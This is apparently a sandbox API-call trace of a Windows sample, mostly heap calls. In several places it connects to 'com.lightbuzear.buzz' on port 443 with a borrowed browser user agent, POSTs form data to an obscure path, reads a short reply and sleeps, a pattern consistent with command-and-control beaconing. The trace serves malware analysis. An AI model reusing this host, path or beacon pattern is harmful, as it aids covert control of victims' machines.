HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0290.936] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0290.936] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0290.936] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0290.936] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0290.936] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0290.937] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0290.937] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec78 [0290.937] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0290.937] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec30 [0290.937] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0290.937] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0290.937] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec30 | out: hHeap=0x4780000) returned 1 [0290.937] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be640 [0290.937] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0290.937] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0290.937] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be640 | out: hHeap=0x4780000) returned 1 [0290.937] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be7a8 [0290.937] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0290.937] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be6e0 [0290.938] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0290.938] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0290.938] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0290.938] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0290.939] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be6e0 | out: hHeap=0x4780000) returned 1 [0290.939] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0290.939] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0290.939] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0290.939] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0290.939] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0290.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0290.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0290.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0290.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0290.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0290.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec00 [0290.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0290.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec30 [0290.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec00 | out: hHeap=0x4780000) returned 1 [0290.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0290.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec30 | out: hHeap=0x4780000) returned 1 [0290.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be528 [0290.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0290.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0290.940] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be528 | out: hHeap=0x4780000) returned 1 [0290.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be690 [0290.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0290.940] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be370 [0290.941] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0290.941] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0290.941] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0290.941] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0290.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be370 | out: hHeap=0x4780000) returned 1 [0290.942] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0290.942] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0290.942] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0290.942] FreeLibrary (hLibModule=0x71570000) returned 1 [0290.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0290.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0290.942] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be618 | out: hHeap=0x4780000) returned 1 [0290.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5c8 | out: hHeap=0x4780000) returned 1 [0290.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf298 | out: hHeap=0x4780000) returned 1 [0290.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0290.943] Sleep (dwMilliseconds=0x2710) [0290.953] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0290.953] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0290.953] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0290.953] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0290.953] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0290.953] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0290.953] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0290.953] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0290.953] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0290.953] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec60 [0290.953] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0290.953] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ec30 [0290.953] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec60 | out: hHeap=0x4780000) returned 1 [0290.953] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0290.953] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec30 | out: hHeap=0x4780000) returned 1 [0290.953] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eab0 [0290.953] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0290.954] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0290.954] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0290.954] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0290.954] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0290.954] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0290.955] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0290.955] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0290.955] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0290.955] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0290.955] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0290.955] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0290.955] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0290.955] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0290.955] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ebb8 [0290.955] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0290.955] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eac8 [0290.955] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebb8 | out: hHeap=0x4780000) returned 1 [0290.955] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0290.955] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eac8 | out: hHeap=0x4780000) returned 1 [0290.955] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf298 [0290.955] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0290.955] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0290.955] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf298 | out: hHeap=0x4780000) returned 1 [0290.955] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf298 [0290.955] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0290.956] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be3c0 [0290.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0290.956] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0290.957] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0290.957] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0290.957] FreeLibrary (hLibModule=0x71780000) returned 1 [0290.957] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be3c0 | out: hHeap=0x4780000) returned 1 [0290.957] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0290.957] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be578 [0290.957] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0290.957] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0290.957] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0290.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0290.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0290.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0290.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0290.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0290.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0290.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0290.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ebb8 [0290.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0290.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eac8 [0290.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebb8 | out: hHeap=0x4780000) returned 1 [0290.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0290.958] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eac8 | out: hHeap=0x4780000) returned 1 [0290.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ecd8 [0290.958] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be6b8 [0290.959] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be6b8 | out: hHeap=0x4780000) returned 1 [0290.959] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0290.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be550 [0290.959] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0290.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5a0 [0290.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0290.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0290.959] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0290.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0290.959] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0290.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0290.959] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0290.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0290.959] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0290.959] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ebb8 [0290.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0290.960] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ecf0 [0290.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ebb8 | out: hHeap=0x4780000) returned 1 [0290.960] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0290.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecf0 | out: hHeap=0x4780000) returned 1 [0290.960] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eac8 [0290.960] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5c8 [0290.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5c8 | out: hHeap=0x4780000) returned 1 [0290.960] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0290.960] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0290.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0290.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0290.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0290.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0290.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0290.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0290.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0290.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0290.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0290.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eae0 [0290.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0290.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eaf8 [0290.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0290.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0290.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eaf8 | out: hHeap=0x4780000) returned 1 [0290.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be528 [0290.961] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0290.961] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0290.962] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be528 | out: hHeap=0x4780000) returned 1 [0290.962] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be348 [0290.962] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0290.962] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be618 [0290.962] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0290.962] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0290.962] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0290.963] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0290.963] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be618 | out: hHeap=0x4780000) returned 1 [0290.963] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0290.963] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0290.963] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0290.963] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0290.963] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0290.985] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0290.985] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0290.985] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0290.985] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0290.985] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ec78 [0290.985] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0290.985] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ecf0 [0290.985] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ec78 | out: hHeap=0x4780000) returned 1 [0290.985] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0290.985] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecf0 | out: hHeap=0x4780000) returned 1 [0290.985] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be528 [0290.985] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0290.985] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0290.985] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be528 | out: hHeap=0x4780000) returned 1 [0290.985] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be398 [0290.985] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0290.985] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be730 [0290.986] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0290.986] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0290.986] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0290.986] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0292.552] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be730 | out: hHeap=0x4780000) returned 1 [0292.552] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0292.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0292.553] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0292.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0292.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0292.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0292.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0292.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0292.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0292.553] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0292.553] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0292.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0292.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ecf0 [0292.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0292.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eae0 [0292.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ecf0 | out: hHeap=0x4780000) returned 1 [0292.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0292.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eae0 | out: hHeap=0x4780000) returned 1 [0292.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be5c8 [0292.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0292.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0292.554] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be5c8 | out: hHeap=0x4780000) returned 1 [0292.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be528 [0292.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0292.554] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be5f0 [0292.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0292.555] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0292.555] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0292.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0292.556] HeapFree (in: hHeap=0x4780000, 